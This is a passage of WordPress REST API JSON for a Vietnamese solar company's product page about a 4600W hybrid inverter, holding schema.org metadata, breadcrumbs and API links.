ph\u00fat"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp","url":"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp","name":"Inverter hybrid 4600W - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","isPartOf":{"@id":"https:\/\/solarquangbinh.com\/#website"},"datePublished":"2018-06-07T14:55:27+00:00","dateModified":"2021-07-24T12:21:10+00:00","description":"B\u1ed9 chuy\u1ec3n \u0111\u1ed5i \u0111i\u1ec7n \u0111a d\u1ee5ng 4600W - hybrid inverter t\u1eadn d\u1ee5ng t\u1ed1i \u0111a \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng, ch\u1ec9 b\u00f9 \u0111i\u1ec7n l\u01b0\u1edbi khi thi\u1ebfu, l\u01b0u tr\u1eef n\u0103ng l\u01b0\u1ee3ng d\u01b0 th\u1eeba v\u00e0o b\u00ecnh \u1eafc quy,\u0111i\u1ec7n l\u01b0u tr\u1eef s\u1ebd \u0111\u01b0\u1ee3c n\u1ea1p\/x\u1ea3 h\u1eb1ng ng\u00e0y","breadcrumb":{"@id":"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp#breadcrumb"},"inLanguage":"vi","potentialAction":[{"@type":"ReadAction","target":["https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Trang ch\u1ee7","item":"https:\/\/solarquangbinh.com\/"},{"@type":"ListItem","position":2,"name":"S\u1ea3n ph\u1ea9m","item":"https:\/\/solarquangbinh.com\/?page_id=20"},{"@type":"ListItem","position":3,"name":"Inverter hybrid 4600W"}]},{"@type":"WebSite","@id":"https:\/\/solarquangbinh.com\/#website","url":"https:\/\/solarquangbinh.com\/","name":"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","description":"\u0110i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi Qu\u1ea3ng B\u00ecnh, Solar Quang Binh, Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef, pin n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, Solar Quang Binh","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/solarquangbinh.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"vi"}]}},"_links":{"self":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v3\/product\/1639"}],"collection":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v3\/product"}],"about":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=\/wp\/v2\/media\/2839"}],"wp:attachment":[{"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1639"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=1639"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/solarquangbinh.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=1639"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}